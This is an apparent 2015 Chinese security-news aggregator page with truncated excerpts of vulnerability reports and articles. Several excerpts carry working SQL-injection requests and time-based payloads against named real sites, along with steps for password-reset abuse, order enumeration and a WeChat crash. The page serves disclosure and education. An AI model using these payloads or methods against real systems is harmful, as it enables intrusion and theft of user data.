记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

苏宁易购某站任意用户密码重置及帐户劫持(影响你的RMB)

code 区域苏宁消费金融有限公司是经中国银行业监督管理委员会批准成立的,由苏宁云商集团股份有限公司、南京银行股份有限公司、法国巴黎银行个人金融集团 (BNP Paribas Personal Finance)、江苏洋河酒厂股份有限公司和先声再康江苏药业有限公司五家企业共同出资申请设立的非银行金融机构。公司注册资本3亿元,总部设在南京,是江苏省首家专业专注于消费金融领域的金融机构,也是全国第一家民营为主的混合所有制消费金融公司。苏宁消费金融致力于打造国内一流的消费金融品牌。依托苏宁云商强大的渠道客户资源、南京银行丰富的金融行业经验以及法国巴黎银行全球领先的风险控制技术,苏宁消费金融将以更具突破性的创新思维和科学态度,努力打造互联互通的O2O消费金融新模式。面对国内经济发展的新常态,苏宁消费金融将全力推动
发布时间:2015-09-03 12:15 | 阅读:136 | 评论:0 | 标签:无

Suning某站点SQL注入漏洞(附验证脚本)及任意文件读取漏洞

漏洞站点:online.suning.com1)SQL注入漏洞测试代码:code 区域POST /console/Service/supplieradmin/leaveMessage/pageLeaveMsg HTTP/1.1Host: online.suning.comProxy-Connection: keep-aliveContent-Length: 68Accept: application/json, text/javascript, */*; q=0.01Origin: http://online.suning.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWeb
发布时间:2015-09-03 12:15 | 阅读:40 | 评论:0 | 标签:注入 漏洞

酷我音乐某处MySQL盲注漏洞(root权限)

code 区域修复不当吧,GET /album/h/xinQingView?id=8 AND 3*2=6 AND 892=892 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://album.kuwo.cn/Cookie: JSESSIONID=D608828B56CD514EC66631C60BF385FE.worker1Host: album.kuwo.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrom
发布时间:2015-09-03 12:15 | 阅读:73 | 评论:0 | 标签:漏洞

新浪某接口SQL注入

http://common.sc.sina.com.cn/vote/list.php?callback=?&limit=100&p=1&pid=8956&sort=1&updown=asc注入点 sort 漏洞证明: 猜解user()第一位为chttp://common.sc.sina.com.cn/vote/list.php?callback=?&limit=100&p=1&pid=8956&sort=(sleep(ord(mid(user()from(1)for(1)))=99))&updown=asc [09:41:02] Start to retrive MySQL User:. . [in pro
发布时间:2015-09-03 12:15 | 阅读:67 | 评论:0 | 标签:注入

和讯网某处存在SQL注入&源代码信息泄漏

svn信息,导致代码泄露 code 区域http://sjb.licaike.hexun.com/.svn/entries 漏洞证明: sql注入 code 区域http://quote.futures.hexun.com/EmbPrice.aspx?market=1&type=al%%27%20AND%202509=2509%20AND%20%27%%27=%27 code 区域http://quote.futures.hexun.com/EmbPrice.aspx?market=1&type=al%%27%20AND%202509=2508%20AND%20%27%%27=%27 好奇怪 没有裤子,,,, 修复方案:
发布时间:2015-09-03 12:15 | 阅读:11 | 评论:0 | 标签:注入

某网游交易代练站SQL注入ROOT权限(同时影响手游站和手机版))

code 区域http://www.maihaome.com/mobile/index.php?m=default&c=category&a=index&id=2556&brand=0&price_min=0&price_max=0&filter_attr=0&sort=goods_id&order=DESC&keywords=%E8%89%BE%E6%8B%89 漏洞证明: 管理入口http://www.maihaome.com/mobile/index.php?m=admin&c=index&a=login查了一下,包括21.22.9090端口都是开放着的旁站也一起影响了,上马提权绝服务
发布时间:2015-09-03 12:15 | 阅读:58 | 评论:0 | 标签:注入

中国国旅IOS客户端存在严重设计缺陷可查看任意用户订单详情和联系人详细信息

1、目标:国旅在线IOS客户端2、使用自己正确的账号进行登陆,拦击返回包(使用手机为181的号码登陆)3、将返回包中的login_id修改为任意存在的就可以了(都是数字可以遍历)(查看了151开头的用户的订单信息) 漏洞证明: 4、查看订单详情 修复方案: 采用多种方式进行身份认证
发布时间:2015-09-03 12:15 | 阅读:36 | 评论:0 | 标签:iOS

51汽车APP任意用户密码重置与任意手机号码注册漏洞(影响近百万用户)

1)密码重置部分 找个豪车车主测试 (土豪我们做朋友吧)找回密码 抓包 返回了一串乱码 一看就是base64 解密看看 验证码竟然直接返回了 登录成功!2)任意手机号注册部分同样 注册验证码在返回包中直接返回 漏洞证明: 修复方案: 程序员应该更重视安全,而不是图方便。有礼物么?
发布时间:2015-09-03 12:15 | 阅读:7 | 评论:0 | 标签:漏洞

1年之内再造一个尖刀?新团队107成员招募中。

三年前当很多人质疑我们的时候,小伙伴们问我:“子龙,你怎么看?” 我对团队讲,时间是最好的证明,我们身处于一个看相即本的世界里,现在大家怎么看我们不重要,三年之后我们一起再看尖刀! 时间很快,转眼就是三年!我们从高调、到低调、到闷声做研究,一群毛头小子简简单单的一起交流,共同成长,就这样慢慢的走了过来,有了爱尖刀、穷奇漏洞库、有了校园安全联盟、有了书安,我们有了很多宝贵的财富,但一直封闭在内部大家并没有再对外做些什么,我们很小,却又很大,我们深知我们要做什么,也明白什么不该做! 这三年,网络尖刀团队在封闭的情况下一直做着加法,直到团队饱和! 很多人在问我,怎么才能加入?不是我们不想加,是我们深知一旦再多了,可能就没有现在这么纯粹了。 闭关锁国? 闭关锁国?还是另谋他路?这是我内心里一直存在的挣扎。 疯子说,我要
发布时间:2015-09-03 07:35 | 阅读:284 | 评论:0 | 标签:业界 107

Empire:PowerShell后期漏洞利用代理工具

文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用!Empire是一个纯碎的PowerShell后期漏洞利用代理工具,它建立在密码学、安全通信和灵活的架构之上。Empire实现了无需powershell.exe就可运行PowerShell代理的功能。快速部署后期漏洞利用模块,从键盘记录器到Mimikatz,并且能够适应通信躲避网络检测,所有的这些功能都封装在一个以实用性为重点的框架中。为什么会选择PowerShell?PowerShell有很多攻击优势,包括完整的.NET框架的访问,应用程序白名单,可以直接访问Win32 API,在内存中加载恶意的二进制文件,并且默认安装在了Windows 7+中。2014年是PowerShell发挥攻击优势的转折性的一年。虽说有很
发布时间:2015-09-03 03:50 | 阅读:250 | 评论:0 | 标签:WEB安全 系统安全 Empire powershell Prox 代理 漏洞利用 漏洞

iOS最新版本现神秘Bug 可直接崩溃iPhone

还有一周的时间,iPhone 6S将会在北京时间9月10日凌晨1点召开新品发布会。但是在这之前,四叶草安全旗下CloverSec实验室团队(q.bugscan.net)却发现了苹果iOS系统存在一个神秘的Bug,通过向iPhone手机用户发送一段包含特殊字符的SMS短信或者iMessage短消息,就会让对方的手机立刻崩溃或者重启。重启后再次打开短信,如果直接到短信列表,那么程序会马上再次崩溃,而如果直接来到包含此短信的会话,会尝试跳转到另一个对话,然后还是崩溃。这样一来短信功能将完全被废掉。但也是可以自救的,就让别人再给你随意发一条正常短信内容。视频演示:经过四叶草的技术工程师试验,这个Bug会影响多种型号的iPhone、iPad和多个版本的iOS,包括最新的iOS 8.4.1版本。
发布时间:2015-09-03 01:45 | 阅读:294 | 评论:0 | 标签:iOS phone

服务端模板注入:现代WEB远程代码执行(补充翻译和扩展)

0x00 前言 原文链接:https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf 最近看了这篇文章,其实也不是新技术,但是作者给出的两个攻击案例很不错,看到drops里面有人翻译了这篇文章,但是没有把攻击案例翻译出来,于是把这部分内容补充上。这两个案例分别针对FreeMarker和Velocity,所以把作者针对这两个模板引擎编写Exploit的过程也翻译出来。 0x01 开发Exploit 很多的模板引擎都会试图限制模板程序执行任意代码能力,来防止应用层逻辑对表达式引擎的攻击。还有一些模板引擎则尝试通过沙盒等手段来安
发布时间:2015-09-03 00:35 | 阅读:237 | 评论:0 | 标签:技术分享 注入

破解使用radius实现802.1x认证的企业无线网络

0x01前言概述 针对开放式(没有密码)无线网络的企业攻击,我个人感觉比较经典的攻击方式有2种,一种是eviltwin,一种是karma。karma应该是eviltwin攻击手法的升级版,攻击者只需要简单的监听客户端发的ssid探测和响应包就可以实现中间人了,受害者很少会有察觉。而且坊间曾有一个错误的认识,认为隐藏的ssid是不受karma影响的。但是实际情况是,客户端如果曾经连接过隐藏的ssid,也会广播这些网络的探测包。尽管karma这种攻击方式已经有10多年的历史了,但是在MAC OSX,ubuntu,老版本的andorid系统上依然有效。win7的默认配置居然是防护karma攻击的。 对加密的无线网络,针对个人网络,很多是使用wpa2-psk预共享密钥的方法来限制访问。而公司的无线网络有使用wpa2企
发布时间:2015-09-03 00:35 | 阅读:292 | 评论:0 | 标签:工具收集

运维安全概述

0x00 前言 运维安全是企业安全保障的基石,不同于Web安全、移动安全或者业务安全,运维安全环节出现问题往往会比较严重。 一方面,运维出现的安全漏洞自身危害比较严重。运维服务位于底层,涉及到服务器,网络设备,基础应用等,一旦出现安全问题,直接影响到服务器的安全;另一方面,一个运维漏洞的出现,通常反映了一个企业的安全规范、流程或者是这些规范、流程的执行出现了问题,这种情况下,可能很多服务器都存在这类安全问题,也有可能这个服务还存在其他的运维安全问题。 本文一方面希望帮助甲方覆盖一些盲点,另一方面也能够为白帽子提供一些漏洞挖掘的方向和思路。 0x01 Attack Surface 一图胜千言,下图是个人近期总结的一些常见的运维风险点。 附XMIND源地址: https://github.com/LeoHu
发布时间:2015-09-03 00:35 | 阅读:312 | 评论:0 | 标签:运维安全

东亚银行平行越权遍历用户敏感信息

还款管理 还他行信用卡查询的地方,可以点击查看交易流水号遍历下流水号试试在浏览器里面看比较直观,可以越权获取到其他人的姓名、还款卡号、信用卡号、还款金额等信息。 漏洞证明: 如上 修复方案: 限制用户权限,禁止平行越权。
发布时间:2015-09-02 21:35 | 阅读:273 | 评论:0 | 标签:无

微信某功能存在漏洞可导致严重的客户端拒绝服务攻击

利用小视频暂存功能上传畸形文件,好友的客户端在解析视频时发生错误崩溃退出。由于小视频自动播放选项默认打开,因此本攻击会产生非常大的危害。I. 上传任意视频文件1. 拍摄一段小视频并暂存。2. 准备要发送的文件,格式转换为 x264 + AAC,封装容器为 MP4,分辨率、长度及其它编码参数没有限制,但文件大小不得超过 1 MB。3. 导出视频的第 1 帧,作为封面图片。(此步可选)4. 在 存储卡/tencent/MicroMsg/<id>/draft/ 目录下找到刚刚暂存的小视频,用第 2 步制作的文件替换暂存视频本体,用第 3 步制作的文件替换 thumb。5. 在朋友圈发送暂存的小视频,可以看到其内容已被替换为第 2 步中的文件。II. 发送畸形小视频,使好友的朋友圈无法正常阅读1.
发布时间:2015-09-02 21:35 | 阅读:278 | 评论:0 | 标签:漏洞

公告

❤ 关注Hackdig微博,点击下方按钮⇩
关注Hackdig微信,学习技术更方便

工具

推而广之

标签云